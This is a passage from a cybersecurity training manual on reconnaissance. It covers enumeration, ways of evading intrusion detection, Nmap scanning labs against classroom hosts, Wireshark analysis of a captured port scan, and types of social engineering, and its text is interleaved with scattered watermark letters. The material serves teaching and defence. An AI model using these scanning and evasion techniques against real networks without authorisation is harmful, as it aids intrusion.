1. Attacker A sends a synchronization request packet to Target B (SYN).
2. Target B sends an acknowledgement of this request back to Attacker A (SYN-ACK).
3. Attacker A sends an acknowledgement back to Target B (ACK).
Note: A SYN request without a resulting acknowledgement (ACK) implies that the target did
e
not accept the packet.
ut
ib
tr
is
D
or
e
at
lic
Figure 3-5: A scanning tool (Vega) detecting the presence of AJAX in a web app.
Enumeration Methods
up
Enumeration Methods Attackers use enumeration to map a network. They can do this in several ways, including:
• Querying Domain Name System (DNS) servers. DNS servers are common reconnaissance
D
targets because, if not properly secured, they can provide a detailed map of an organization's
entire network infrastructure.
• Enumerating Simple Network Management Protocol (SNMP) devices on a network. A poorly
ot
secured SNMP protocol may enable an attacker to configure a device maliciously.

• Discovering a host's NetBIOS name. This can lead an attacker to identify a particular host.
• Establishing a NetBIOS null session. This can enable an attacker to connect to a remote host
N
without a user name and password, where they can view information about policies, groups, and
other domain information.
• Enumerating domain directories like Active Directory. If an attacker identifies a poorly secured
o
user account or network share, they can use this to take advantage of other systems. They can
D
also crawl directory services to enumerate email accounts, which is useful in a variety of attacks.
• Enumerating applications that run on web servers, like Microsoft's Internet Information Services
(IIS). This enables the attacker to craft their exploits to target certain web server software.
• War driving to identify wireless networks in range of a moving vehicle.
• Fingerprinting hosts to determine their operating systems and other details and characteristics.
A malicious executable for one operating system may not work on another, so an attacker must
know their targets' platforms.

e
ut
ib
tr
is
Figure 3-6: Using Nmap to enumerate networking information.
D
Variables Affecting Reconnaissance
The exact tools and methods an attacker uses for reconnaissance, as well as how effective they are, Variables Affecting
will vary depending on the following major factors:
or
• Wireless vs. wired: Wired connections will limit an attacker's ability to sniff traffic transmitted
outside their own connected host unless they are able to configure the switch or router to
forward all traffic to their host. In a wireless network, the attacker will be able to sniff every node
Reconnaissance
e
connected to the access point. However, in most secure environments, the network will be
at
configured with an encryption scheme like Wi-Fi Protected Access 2 (WPA2) or WPA3. This can
prevent the attacker from reading a packet's contents, unless the attacker is able to capture the
authentication handshakes between a node and the access point. Ultimately, the type of network
lic
can limit the reach of a reconnaissance attempt, as well as its effectiveness in gathering usable
information.
• Virtual vs. physical: Virtual systems may be set up as a sandbox used to foil the attacker; if
up
properly segmented, the attacker will learn very little, or they may end up operating under false
assumptions about how the network and its hosts are configured. Still, some organizations
virtualize quite a bit of their infrastructure, so the attacker may be able to discover valuable
information without needing to engage in physical reconnaissance. Depending on the attacker's
D
relationship with their target, they may be able to gain physical access to an organization and
scout its various devices and appliances.
• Internal vs. external: As you've seen, insiders are often at an advantage when it comes to
ot
valuable knowledge about how an organization operates. If they already have the information
that will enable them to launch a successful attack, then they may not need to engage in the kind
N
of deep reconnaissance that will put their attack at risk of being discovered. External actors, on
the other hand, will often have a more difficult and drawn-out reconnaissance phase. However,
the advantage is not always in the insider's favor; any reconnaissance they actually do could be
o
more easily traced back to them. An external actor, on the other hand, may be more effective at
shielding themselves with anonymity.
D
• On-premises vs. cloud: Many organizations are ill equipped to secure their operations against
attack. Attackers can perform reconnaissance on insecure on-premises systems with relative ease.
If an organization's infrastructure is hosted in the cloud, on the other hand, they may be unable
to penetrate the cloud vendor's security. Still, security-minded organizations will have full control
over their on-premises systems. In a cloud environment, the organization is often at the mercy of
the provider, and must trust they will adequately protect the organization's assets. This trust is

often misplaced, especially since cloud providers are huge targets that store sensitive data for
many different organizations.
Consider mentioning
that the interface
between cloud provider How Attackers Evade Detection During Reconnaissance
and client can also affect
reconnaissance. Organizations typically employ a network-based intrusion detection system (NIDS) to detect
How Attackers Evade technical reconnaissance mechanisms like scanning and enumeration. An NIDS employs different
Detection During methods of detection, but one of the most common methods is through signature analysis.
e
Reconnaissance Signature analysis is similar to its use in anti-malware software in that it compares an action against
known attack properties, and if these match, it produces an alarm. There are, however, ways that
ut
attackers bypass signature-based network intrusion detection:
Ensure students know • The attacker obfuscates their network packets so the NIDS will be unable to match its signature
there are techniques for
ib
with known values. The packets might include extra, irrelevant characters or characters that
inspecting encrypted
transmissions, so this
perform the same function but in different ways. The effectiveness of this technique will depend
evasion technique is not on the strength of the NIDS, as newer systems may be smart enough to interpret these attempts
tr
always effective. at obfuscation.
• If traffic across the network is encrypted, the NIDS will be unable to analyze its contents in most
is
cases. Attackers can use this to their advantage by allowing their reconnaissance efforts to be
encrypted.
D
• The attacker may also take a more aggressive approach by initiating a DoS on the NIDS. Like
other network devices and technology, a NIDS flooded with too much traffic will be unable to
perform its duties, rendering it useless in detecting a reconnaissance attempt.
or
• The attacker may be able to avoid notice entirely if they perform reconnaissance exclusively
through public sources. In this case, the attacker is not at risk of being detected, or is at least
shielded from detection since anyone can access these public sources.
e
Reconnaissance Tools
at
Reconnaissance Tools The following are examples of popular tools attackers may use for reconnaissance.
As time permits,
lic
Footprinting tools
consider demonstrating
some of these tools or • Whois
navigating to the sites • nslookup
up
that host them. • dig

• Recon-ng
• FOCA
D
• Maltego
Scanning tools
• Nmap®
ot
• ping
• tracert
N
• netstat
• Netcat
• Snort®
o
• Vega
D
Enumeration tools
• Nmap
• Nessus®
• snmpwalk
• smbmap
• nbtscan

• Cain & Abel
Additional Tools
Almost every security or attack tool that reveals some kind of information about a target can be
used in reconnaissance. For example, vulnerability scanners; intrusion detection/prevention systems
(network and host based); security information and event management (SIEM); network appliance
logs (e.g., rule-based firewall logs); system logs (e.g., syslogs); and more are always potential
components of an attacker's reconnaissance suite.
e
Packet Trace Analysis
ut
Packet trace analysis, also known as traffic analysis, is one of the most powerful techniques for Packet Trace Analysis (2
detecting and assessing reconnaissance threats, as well as many other types of cyber attacks. Slides)
ib
The contents and metadata of captured packets can reveal a lot, but even by just looking at general Students will be using
Wireshark in the
flow patterns of packet traffic, you can be tipped off to a potential problem. Packet trace analysis
upcoming activities.
tr
can reveal insights without digging into packet content, such as when the packet contents are However, consider
encrypted. For example, a brief exchange of small payloads with consistent pauses between each briefly demonstrating the
is
packet might imply an interactive session between two hosts, whereas sustained streams of large tool here.
packets might imply a file transfer. This is not much to go by on its own, but combined with other
sources, packet trace analysis can reveal useful information.
D
Clues derived from packet trace analysis might help an intruder, but they are also quite useful for
defensive monitoring and security intelligence analysis. Over time, your monitoring system can
reveal potential problems. or

establish baselines of traffic patterns. Then anomalies that deviate from those patterns can help to
In some regards, command-line tools, such as tcpdump, are convenient for packet trace analysis
because they are often present within the operating system, can be driven by scripts, and produce
e
structured content that can be processed by scripts. So they are geared toward quick-and-dirty
at
manual analysis or automated (script-driven) analysis, but they typically do not provide the advanced
analysis features included in a graphical tool such as Wireshark.
lic
up
D
ot
N
o
D
Figure 3-7: Packet trace analysis with Wireshark.

ACTIVITY 3-2
Performing Reconnaissance on a Network
Before You Begin
e
You'll be using Kali Linux™, an operating system designed to support experts in many different
areas of security. Kali Linux comes pre-packaged with hundreds of open source tools, including
ut
Nmap, a network scanner.
You will run Kali Linux as a virtual machine (VM) using Oracle's VirtualBox software, with your
ib
Windows® 10 computer as the host. VirtualBox and the Kali Linux VM have already been installed
and configured. You will also be targeting your other computer, a Windows Server® 2019 domain
controller.
tr
Activity: Performing
Reconnaissance on a Scenario
is
Network
You want to see how attackers can execute a reconnaissance attack. You'll scan your network and
Be sure to provide
hosts to see the kind of useful intelligence an attacker can glean. Understanding the nature of these
D
students with the IP
addresses to their
reconnaissance threats will enable you and your team to eliminate weaknesses in your network that
Windows 10 client, Kali reveal too much information.
Linux VM, and Windows
Server 2019 machine.
1. Start Kali Linux and Nmap. or
a) From the desktop, double-click the Oracle VM VirtualBox shortcut.
e
at
lic
up
Note: If a message box pops up telling you a new version of VirtualBox has
been released, select OK.
D
b) In the Oracle VM VirtualBox Manager window, with the CFR-Kali VM profile selected, select Start.
ot
N
o
D
c) Close any of the warning bars at the top of the screen.

d) At the login screen, enter kali as the user and kali as the password.

e) From the Kali Linux desktop, select the Terminal Emulator icon on the top-left panel.
e
f) At the terminal command prompt, enter nmap
ut
Caution: Commands in Unix-like systems are case sensitive. Be mindful of
how you type.
ib
g) Examine the options for Nmap. Scroll up and, under HOST DISCOVERY, find the options to conduct
a ping scan to discover hosts.
tr
is
D
or
e
at
lic
up
D
ot
N
2. Under HOST DISCOVERY, what option runs a simple ping scan?

A: nmap –sn
o
Under SCAN TECHNIQUES, what option runs a TCP Connect() scan?

D
3.
A: nmap -sT
4. Under OS DETECTION, what is the option to run an operating system

discovery scan?
A: nmap –O

5. Under OUTPUT, what does the –v option mean in Nmap?

A: More verbose responses for more detail in the scan.
6. View the Nmap manual.

a) At the command prompt, enter man nmap to view the complete manual for the tool.
Note: You can get similar results by going to nmap.org.
e
b) Skim the description of Nmap and verify its command-line syntax under the SYNOPSIS section.
ut
ib
tr
is
D
or
e
at
lic
up
D
c) When you're finished, press q to quit the manual.
7. Using what you've learned about Nmap, run a ping scan against your local
ot
network.
a) At the command prompt, enter sudo nmap –sn 10.39.5.0/24
N
Note: In order to detect the Windows Server machine, Nmap must be run with
superuser (root) privileges. This is what the sudo command does.
o
If your network setup is b) When prompted to enter the password, enter kali
D
different, provide
students with the IP Note: By default, when running a command with sudo, the system will prompt
range of the classroom you for a password every five minutes. You can enter the kali password any
computers. time you're prompted throughout the course.

c) Note the number of hosts identified by the scan.

Your client, server, and the network router should be revealed. The total number of hosts will Encourage students to
depend on your classroom network. share the number of
hosts they found.
e
ut
ib
tr
The command that
8. Run operating system discovery scans using Nmap. students should run for
is
step 8a is sudo nmap
a) Run an operating system discovery scan against your server in verbose mode.
–O -v 10.39.5.#,
where # is the last
D
number in their server's
IP address. Adjust the IP
address, if necessary.
or If at any time students

forget to use sudo, they
can rerun the last
entered command with
e
root privileges by
entering sudo !!
at
lic
up
D
ot
N
o
D
Note: Remember to prefix this command and the following commands with
sudo so they execute with root privileges.
The command that
b) Now run the same scan against your router.
students should run for
Note: You can press the Up Arrow on your keyboard to display the command step 8b is sudo nmap
–O -v 10.39.5.1.
you last entered.
Adjust the IP address, if
necessary.

9. You could have run the operating system discovery scan against all the
devices in your network at the same time.
Why would you generally not wish to do that in a production environment?
A: It generates a lot of traffic and could impact network performance.
10.Run a TCP Connect() scan against your server and router using Nmap.
Note: You can scan multiple addresses at once by separating each IP address
e
with a space.
ut
The command that
students should run for 11.Which host showed more port numbers active, and why?
step 10 is sudo nmap
ib
–sT 10.39.5.1 A: The server has more port numbers open because it is a general purpose system rather than a
10.39.5.#, where # is focused one like a router.
tr
the last number in their
server's IP address. 12.What are some of the open ports on your server? Are any of them out of the
Adjust the IP address, if ordinary?
is
necessary.
A: Answers will vary, but you'll see several ports you should expect to be open, like 53 (DNS) and
389 (LDAP). However, an open port like 22 (SSH) may potentially be used as an attack surface.
D
13.Close the open terminal and minimize the Kali Linux VM window.
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 3-3
Examining Reconnaissance Incidents
Data Files
e
\Wireshark-win64-2.0.1.exe
ut
\Reconnaissance.pcapng
ib
Activity: Examining
Before You Begin Reconnaissance
tr
Incidents
You'll be using Wireshark on your Windows 10 client to analyze previously captured packets.
Wireshark is a sniffer or protocol analyzer that allows for real-time or saved captures of traffic on a
is
network interface.
Protocol analyzers are
D
Scenario discussed in more detail
later in the course.
One of your new security analysts at Develetech saw a suspicious warning from your IDS that
Before teaching this
attacks were targeting your network, so the analyst started the protocol analyzer Wireshark, and
consider what you can do to prevent such attacks in the future. or

managed to capture one of these attacks in action. You'll determine what type of attack it was and
activity, consider
refreshing students'
knowledge of the
difference between
e
destination and source
1. Start Wireshark and acquaint yourself with its interface. port numbers.
at
Students could also run

a) From the desktop, double-click the Wireshark shortcut.
Wireshark on Kali Linux,
though they'd need to
lic
add the .pcapng file to

their VM first.
up
Note: If you are prompted to update Wireshark, select Skip this version.
D
b) In The Wireshark Network Analyzer window, select File→Open and navigate to the
ot
Reconnaissance.pcapng file. Double-click the Reconnaissance.pcapng file to open it in Wireshark.

N
o
D

c) If necessary, drag the middle pane down to see a display similar to the one shown here.
e
ut
ib
tr
is
D
d) Observe the three Wireshark panes.
• The top pane contains a list of every packet captured in that session and some summary
information about each one. The packet selected is the one you are looking at in the bottom two
or
sections. (In this case, packet 1 is selected.)
• The bottom pane displays a hexadecimal readout of the contents of the selected packet with 16
bytes in each line. If you know your Internet headers very well, you can discover the contents of
the traffic from this area alone.
e
• Fortunately, the middle pane provides a field-by-field interpretation of everything that the bottom
pane displays.
at
e) In the top pane, select packet 1, if necessary.

Note the source and destination IP addresses, the protocol, and the information for this packet.
lic
2. What were the source and destination IP addresses of this packet?

A: Source = 10.39.5.6 and Destination = 10.39.5.2
up
3. In the middle pane, expand the Transmission Control Protocol section by

selecting the right arrow. Note the source and destination port numbers and
D
the flags field.

ot
N
o
D

Note: The port numbers and flags are also displayed in the Info column in the top
pane. (The flags are indicated in brackets.)
4. What was the destination port?

A: 443, commonly used by HTTPS.
5. What flags were set for this packet?

A: SYN (synchronize sequence numbers). A synchronization request is the first packet sent in a TCP
e
session.
ut
6. Analyze the capture file to find the attack(s).
a) From the menu, select Statistics→Conversations.
ib
b) If necessary, select the TCP tab.
tr
is
D
or
e
at
lic
up
c) Select the Packets heading to sort the list by number of packets.

D
d) Scroll through the list of conversations. Note that there are many one-packet and two-packet
sessions, and a few three-packet sessions.
e) Sort by Port B and note the various destination port numbers.
ot
f) Select the Close button to close the Conversations window.

N
7. Follow the TCP stream for packet 1.

a) Right-click packet 1 and from the menu, select Follow→TCP Stream to look at just one session.
b) Close the Follow TCP Stream window.
o
If there were data in the session, you would see it, but there isn't any in this case.
D
8. Look at the flags of these three packets.

What did the attacker do?
A: The attacker started a session (SYN), received the server response (SYN-ACK), and then reset it
(RST). This is called a stealth scan because it interrupts a connection before it can be completed,
potentially evading automated detection systems.

9. Clear the filter and examine packet 42.

a) At the top-right of the window, select the Clear button.
e
ut
b) Select packet 42.
ib
10.Follow the stream and close the pop-up window.
tr
What did the attacker do in this case?
A: The attacker tried to connect using the Telnet protocol (port 23) but was refused by the server.
is
11.Clear the stream and examine the entire packet capture.
D
What was the attacker trying to discover from your system in this attack?
A: Which port numbers were open and which were not. In other words, a port scan.
12.How or
could the attacker proceed after learning this information?
A: The attacker could see what services are running on open ports and try to attack those services.
e
13.Leave Wireshark open.
at
lic
up
D
ot
N
o
D

ACTIVITY 3-4
Capturing and Analyzing Data with Wireshark
Before You Begin
e
Wireshark is still open in Windows 10.
ut
Activity: Capturing and
Scenario Analyzing Data with
Wireshark
Other than reviewing previously captured data, you need to learn how to capture and analyze traffic
ib
Make sure to give
yourself, in case you're the next security team member to see suspicious traffic.
students their classroom
IP addresses if you
tr
haven't already.
1. Generate network traffic to be captured in Wireshark. This activity is intended
is
a) From the menu, select Capture→Options. to teach students how to
b) Select the Ethernet interface and then select the Start button. capture and analyze live
data in Wireshark. This
D
is an important skill that
they can apply in many
places throughout the
or course.
e
at
lic
up
D
c) With the Wireshark capture running, right-click the Windows Start button and select Windows
PowerShell (Admin).
ot
d) If necessary, select Yes in the User Account Control message box. From here on, the
e) At the command prompt, enter ping 10.39.5.1 course activity steps
f) Enter tracert Microsoft.com assume that the student
N
will accept the User

Note: You can choose to let this run until it gets to 30 hops or cancel it after a Account Control and
Open File - Security
few by pressing Ctrl+C.
Warning messages.
o
g) Open your web browser and navigate to windows.microsoft.com.

D

h) Switch to your Wireshark capture and select the red Stop capturing packets button or select
Capture→Stop.
e
ut
Note: You can use the Capture→Options command to specify capturing a
certain amount of data or for a certain time.
ib
2. Use the Wireshark Filter bar to view and analyze only the Internet Control
Message Protocol (ICMP) data.
tr
a) At the top of the Wireshark screen, select the Filter bar.
is
D
or
b) Type icmp and press Enter to create a filter in Wireshark that shows only ICMP data.
Notice that your ping and traceroute traffic shows up here. Remember that you can select any
packet and look at the bottom two panes to see its details.
e
Note: When you create a new filter, Wireshark highlights the Filter bar with red
at
if your filter is incomplete or non-functional. The bar turns green when you
have a filter that works; however, it still may not be the filter you meant to use.
A yellow bar indicates that you're using a deprecated filter.
lic
If you wish to give

students a hint, remind 3. Typically, black packets are ICMP errors.
them these errors were
up
generated by their use of Are the ones in your capture actually an indication of a problem in this case?
traceroute.
A: Not necessarily. Many are time-exceeded errors that are traceroute's way of determining the
routers along the path you specified (in this case, the path to Microsoft's website).
D
4. Clear the Filter bar.

a) At the right end of the Filter bar, select the Clear button.
ot
This eliminates your filter and displays the entire capture.

b) On the Filter bar, select the down arrow to display the previous icmp filter.
N
Note: You can use this technique to rerun a previous filter.

o
5. Use the Filter bar to show only HTTP data.

D
Consider informing a) Select the Filter bar, type http and then press Enter.
students that there is a This displays the web traffic in the capture, including your access to the Microsoft.com website.
difference between
filtering between port 80,
which displays the entire
conversation (including
TCP transmissions), and
HTTP, which does not.

b) In the upper pane, right-click one of the HTTP packets and select Follow→TCP Stream.
e
ut
ib
tr
is
D
or
This opens a new window showing the raw data from that session. Red text indicates the client side
e
of the connection while blue represents the server side.
at
c) Select Close to return to the main capture.

Notice that your HTTP filter has been replaced by one that identifies the stream you were viewing. If
you select the drop-down arrow, you will see that your HTTP and ICMP filters are still available.
lic
6. Create an ip.addr filter to examine the traffic between client and server.
a) Select Clear to clear the Filter bar.
up
D
ot
N
o
D

b) Select the Filter bar, and type ip.
Caution: Do not press Enter yet. Also, make sure you are including the period
at the end.
It's important that Notice that the Filter bar is red and that a drop-down list appears with suggestions for additional
students do not press parts of the filter. You're looking for addr.
Enter until they've
finished building the filter
in the following steps.
e
ut
ib
tr
is
D
or
e
at
c) From the drop-down list, select ip.addr.

d) Continue to add to your filter by typing ==10.39.5.1 and press Enter.
lic
Your filter window should now display ip.addr==10.39.5.1.
Note: In Wireshark, == represents equal to, > represents greater than, and <
represents less than. You can also identify entire networks by using Classless
up
Inter-Domain Routing (CIDR) notation; for example, 10.39.5.0/24 would show

the entire 10.39.5.0 network.
e) Examine the traffic going to and from your router.
D
ot
N
o
D
Note: You can use ip.src to just look at sources or ip.dst for just destinations.
7. Build a more complex filter using the Expression filter builder.

a) Clear the Filter bar.

b) From the menu, select Analyze→Display Filter Expression.
From here, you can build any filter available in Wireshark, including the ones you just did.
c) Scroll through the Field Name list until you find HTTP and expand the options.
e
ut
ib
tr
is
D
or
e
at
d) From the HTTP options, select http.request.method.

e) In the Relation section, select ==.
f) In the Value field, type GET, noting this field is case sensitive.
lic
g) Select OK.
The filter shows up in the Filter bar but hasn't actually been applied yet.
h) Press Enter to apply the filter.
up
This capture displays the HTTP GET requests. This is a useful filter to see what pages people are
accessing.
D
ot
N
8. Combine the HTTP GET filter and an ICMP request filter to view data that
matches either filter.
o
a) In the Filter bar, modify the existing filter to read http.request.method == "GET" || icmp Remind students about
D
the symbols that are

Note: You can combine filters by using two ampersands && (and) and two pipe used to create and (&&)
symbols || (or). and or (||) expressions.

b) Press Enter to apply the filter.

Captured traffic from both the ICMP protocol and HTTP GET requests is displayed.
e
ut
ib
tr
9. Craft a filter to find packets that contain the Transmission Control Protocol
is
(TCP) SYN flag.
D
After testing it, what filter worked for you?
A: The easiest way to filter for TCP SYN traffic would be by using tcp.flags.syn==1. You can also
achieve the same result if you use tcp.flags==0x02 || tcp.flags==0x12 as the filter expression.
10.View or
ICMP warnings logged during the capture.
a) Select Analyze→Expert Information.
e
b) In the Expert Information dialog box, select the Warn drop-down arrow for ICMP to expand its
messages.
at
lic
up
D
ot
N
11.Why do some ICMP requests have no answer?

o
A: This was part of traceroute. Once it got to a firewall, the remaining echo requests were filtered so
they had no answering packet.
D
12.What are the strengths of Wireshark as an analysis tool?

A: Answers will vary, but may include that it sees every packet the interface sees, it has some
advanced analysis capability, and the filters enable you to break down the capture by almost any
metric.

13.What are some weaknesses of Wireshark for packet analysis?

A: Answers will vary, but may include that it only sees what the interface it's connected to does
(which has limited use in a switched network); the captures can only be automated through the
use of third-party tools; and the program has very little intelligence for detecting suspicious
behavior, unlike intrusion detection systems/intrusion prevention systems (IDSs/IPSs).
14.Can Wireshark tell you if certain traffic indicates an attack?

A: No—you must be able to analyze the capture and make that determination.
e
15.Close
Wireshark without saving. Also close any open browser windows and
ut
PowerShell windows.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

TOPIC C
Assess the Impact of Social Engineering
A large part of an attacker's reconnaissance efforts will be to deceive and manipulate their targets.
After all, finding a vector for a technical attack can be a difficult prospect. Instead of going through
that trouble, the attacker can simply exploit the weakest link in any organization: the people.
e
ut
Social Engineering
Social Engineering Social engineering is the practice of deceiving people into giving away access or confidential
ib
information to unauthorized parties. The social engineer typically performs some sort of confidence
trick on a privileged target. The target, ignorant of this trick, uses their privileges to grant the
attacker access or information. This may be the attacker's ultimate goal, but social engineering is
tr
often used as a springboard to a larger, more devastating attack. This is especially true when social
engineering is used in reconnaissance—the attacker deceives employees into revealing information
is
about the company's personnel, its policies, and its operations, which the attacker can use to their
advantage when they plan their attack.
D
When an attacker engages in social engineering, they can even avoid standard cybersecurity defenses
entirely, focusing their attack on undermining human weaknesses rather than crafting highly
technical exploits.
or
Social engineering is one of the most common and successful malicious techniques in information
security. Because it exploits basic human trust, social engineering has proven to be a particularly
effective way of manipulating people into misplacing this trust. A social engineer may pose as an
e
authority figure, like a manager or IT administrator, or someone the user is familiar with, like a
friend or family member. If the façade is believable enough, the victim will likely let their guard
at
down. In many cases, this is enough for the attacker to capitalize on, potentially leading to serious
consequences for the organization.
lic
up
D
ot
N
Types of Social
Engineering
o
Consider asking
students if they can
D
provide real-world
examples of these types
of attacks. Do they have Figure 3-8: A social engineering attack.
experience in being
targeted for a social
engineering attempt? Do Types of Social Engineering
they know anyone who
has been a victim of Social engineering can take several different forms. One type of attack may be more effective against
such an attack? particular targets or it may simply get the attacker more of what they're looking for. Some attack
Lesson 3: Analyzing Reconnaissance Threats to Computing and Network Environments | Topic C

types are simply easier than others to pull off. No matter the reason, each one of the following social
engineering attack types can be troublesome for the organization if taken for granted.
Social Engineering Description

Type
Impersonation This is a human-based attack where an attacker pretends to be someone

they are not. A common scenario is when the attacker calls an employee
and pretends to be calling from the help desk. The attacker tells the
employee they are reprogramming the order-entry database, and they
e
need the employee's user name and password to make sure it gets entered
ut
into the new system.
Impersonation is often successful in situations where an identity cannot
be easily established. If the employee in the previous example doesn't
ib
know the real help desk worker or the help desk number, they may be less
inclined to question the request. Additionally, impersonation may be fairly
tr
successful in face-to-face interactions. Due to various social factors, most
people want to avoid appearing rude or dismissive when they're talking
is
with another human being directly. So, they may not question the
impostor like they would if it were email correspondence. This requires
that the victim doesn't actually know what the individual being
D
impersonated looks like or doesn't know them well enough to doubt their
appearance.
Hoax
or
This is an email-based or web-based attack that is intended to trick the
user into performing undesired actions, such as deleting important system
files in an attempt to remove a virus. It could also be a scam to convince
users to give up important information or money for an interesting offer.
e
Like many social engineering techniques, hoaxes depend greatly on the
at
amount of experience the target has with computer technology. An email

that tells a user to delete a virus file on their computer will likely be
ineffective if the user knows what the file does, or if they know that
lic
antivirus software is the preferred method for detecting and removing

infected files.
up
Quid pro quo Quid pro quo is Latin and can be translated as "something for something"
or "this for that." Essentially, one party does a favor for another party,
but expects a favor in return. In the realm of social engineering, quid pro
quo threats often take the form of the attacker asking a victim for access
D
credentials or sensitive information, and promising to provide that victim

with a "gift" or a favor. For example, an attacker might ask an employee
to fill out a survey about their workplace responsibilities. The information
ot
the employee provides on the form may go into too much detail and give
the attacker some reconnaissance material. At the end of the form, the
attacker claims they will send the employee a prize for being so helpful.
N
The actual gift or favor is not necessarily delivered. However, if the

attacker can guarantee delivery, the victim will be more likely to trust the
o
attacker and give the information they seek.

D


Type
Phishing and These are common types of message-based social engineering attacks. In
SMiShing a phishing attack, the attacker sends an email that seems to come from a
respected source, such as a bank or financial institution. The email claims
the recipient needs to provide an account number, Social Security
number, or other private information to the sender to "verify an
account." Ironically, the phishing attack often claims the "account
e
verification" is necessary for security reasons. Legitimate financial
institutions never solicit this information from their clients.
ut
When the medium used is SMS text messages rather than email, this is
called SMiShing.
ib
Phishing is one of the most prominent forms of social engineering, and
even experienced computer users may be fooled by what appears to be an
authority figure.
tr
Spear phishing and When a phishing attack targets a specific individual or institution, it is
is
whaling called spear phishing. Whaling is a form of spear phishing that targets
individuals or organizations known to possess a good deal of wealth.
D
Whaling targets individuals who work in Fortune 500 companies or
financial institutions whose salaries are expected to be high.
Whaling is a riskier method for social engineers, as security is bound to be
or
more robust than it is with average users or small companies, and the
consequences of being caught will likely be much more severe. However,
exploiting the weakest link can result in a huge payoff for the attacker(s).
e
Vishing This is a human-based attack where the goal is to extract personal,
financial, or confidential information from the victim by using services
at
such as a telephone system and IP-based voice messaging services (Voice

over Internet Protocol or VoIP) as the communication medium. This is
lic
also called voice phishing.

Vishing can be more effective than phishing because of the trust people
tend to place in others they can speak to in real time. In addition, users
up
may be too used to traditional telecommunications to know a VoIP

identity can be much more easily spoofed due to the open nature of the
Internet.
D
Pharming This is an attack similar to phishing that is performed by redirecting a

request for a website, typically an e-commerce site, to a similar-looking,
but fake, website. The attacker can trick the user into entering their
ot
credentials or downloading a malicious file since the user trusts what

appears to be a legitimate website.
N
Baiting Baiting exploits the human tendency toward curiosity by planting physical
media in an area where someone will find it and then promptly use it. For
example, a social engineer might install malware on a removable Universal
o
Serial Bus (USB) drive, then place that drive on the ground in a parking
lot outside a corporate office. An employee who arrives for work may
D
notice that drive, pick it up, then promptly insert it into their workstation.
If their workstation has autorun enabled for removable media, the
malware will immediately infect the host and may spread to other hosts in
the corporate network.
A similar virtual attack occurs when a user is enticed to download free
software, which an attacker has packaged with a Trojan horse.


Type
URL hijacking Also called typo squatting, this is the tactic of exploiting typos that users
sometimes make when entering a URL into a browser. For example, a
malicious user might register a domain with the URL
www.mircosoft.com, which has a minor typo compared to the correct
www.microsoft.com. A user who makes this mistake when entering the
URL into their browser will be directed to the attacker's site, which may
e
mimic the real website or contain malicious software that will infect the
victim's computer.
ut
Spam and spim Spam is an email-based threat where the user's inbox is flooded with
emails that advertise products or promotions for get-rich-quick schemes
ib
and can sometimes deliver malware. Spam can also be used within social
networking sites such as Facebook and Twitter. Spim is an attack similar
to spam that is propagated through instant messaging (IM) instead of
tr
through email.
With the prevalence of spam filters in email clients and spim blockers in
is
instant messaging services, these techniques are less effective than they
used to be. However, the sheer volume of unsolicited messages sent in
D
bulk every day still makes spam and spim viable methods for deceiving
inexperienced users.
Shoulder surfing
or
This is an attack where the goal is to look over the shoulder of an
individual as they enter password information or a PIN. This is very easy
to do today with smartphones. The attacker doesn't even need to be
present—they can set their phone down near the victim's desk, press
e
record, and walk away. Attackers can also shoulder surf at a distance
using surveillance cameras or binoculars. Shoulder surfing is a common
at
tactic among insider threats as they already have physical access to their
colleagues' workspaces.
lic
Dumpster diving This is an attack where the goal is to reclaim important information by
inspecting the contents of trash containers. This is especially effective in
the first few weeks of the year as users discard old calendars with
up
passwords written in them. In addition, an attacker can glean sensitive

financial or operational information from a company that improperly
disposes of hard-copy documents. A typical defense against dumpster
diving is to shred such documents, but with enough time and effort, an
D
attacker may be able to recover a shredded document. This is why some

organizations opt (or are required) to incinerate their confidential
documents.
ot
Tailgating This is a human-based attack where the attacker will slip in through a
secure area following a legitimate employee. The employee does not
N
know the attacker is even behind them. To prevent this type of attack,
organizations often install access control mechanisms at each entrance.
Users should also be educated to be more observant of their
o
surroundings when they enter buildings.

D


Type
Piggybacking This is similar to tailgating, but the primary difference is the employee
actually knows someone is following behind them. The employee may or
may not personally know the attacker. If they do, they could be complicit
in the attack, or they could simply be ignorant of the attacker's intentions
and lack of authorization. For example, the employee may be an
acquaintance of the attacker, but doesn't know the attacker was just
e
terminated from the company. So, they let the attacker in thinking that it's
just another day.
ut
More likely, however, is the employee doesn't know the attacker
personally. Many people would prefer to avoid confrontation even if they
ib
suspect the piggybacker isn't authorized to enter. Some people may not
even consider that the piggybacker doesn't belong, and will open the way
for them just to be polite.
tr
is
Phishing and Delivery Media
Phishing and Delivery Because phishing is perhaps the most popular and effective social engineering type, it's a good idea
D
Media to take a closer look at these attacks.
As you've seen, different variations on phishing, like vishing and SMiShing, imply the use of more
attacks can use: or

than just email as a delivery medium. In fact, there are many such delivery media that phishing
• Email is the standard medium used to entice targets into revealing information. The advantage
of using email is its asynchronous nature: neither the attacker nor the target expects any real-time
e
communication, so the attacker doesn't need to submit to on-the-spot questioning from
at
someone who is skeptical. The attacker can more easily filter out savvy users this way and focus
instead on snaring the inexperienced or gullible. However, the disadvantage of email is that
phishing attempts are often caught by modern spam filters, so the user may never even see the
lic
attempt.
• Electronic postcards, or e-cards, are typically media like video or animations embedded into
email messages. Visually appealing messages can be more successful at enticing users to click
up
them. This is especially true if the attacker puts thought into who they're targeting and what kind
of greeting might be appropriate. For example, if the attacker discovers their target's date of
birth, they can increase their chances of infiltration by crafting a malicious birthday e-card and
sending it to the target on their birthday. The disadvantage of using e-cards is that many email
D
clients will default to blocking visual elements from unknown sources.

• Instant messaging is more of a real-time communication method than email, and may be less
ot
effective because people tend to be more cautious when someone they don't know is messaging
them. However, the quick and expedient nature of instant messaging may actually have the
opposite effect: people may take less time to think about the message they're reading, who sent
N
it, and what the hyperlink will do when they select it. Another potential issue with IM-based
phishing is that spam filters in IM software are not as robust as with email.
• Text messaging has many of the same issues as instant messaging. Most modern phones have
o
SMS capabilities, and most mobile phone users engage in texting. So, if they see a text message
from a number instead of a person from their contacts list, the user may be more likely to
D
disregard the message. However, attackers can reach a much wider audience with SMS than with
instant messaging because neither the attacker nor their targets need to be running specific IM
software.
• Social networking sites have messaging components that approximate IMing and email, so
many of those same issues apply. The attacker may overcome the hurdle of trust if the target
adds people they don't really know to their friends list. Another avenue of attack sees the attacker
impersonating a friend of the target; the attacker gathers personal information beforehand, like

the friend's portrait, age, occupation, and interests, and stages a fake profile. They can then use
this profile to convince the target they know each other, making it easier for the attacker to trick
the target into revealing personal information.
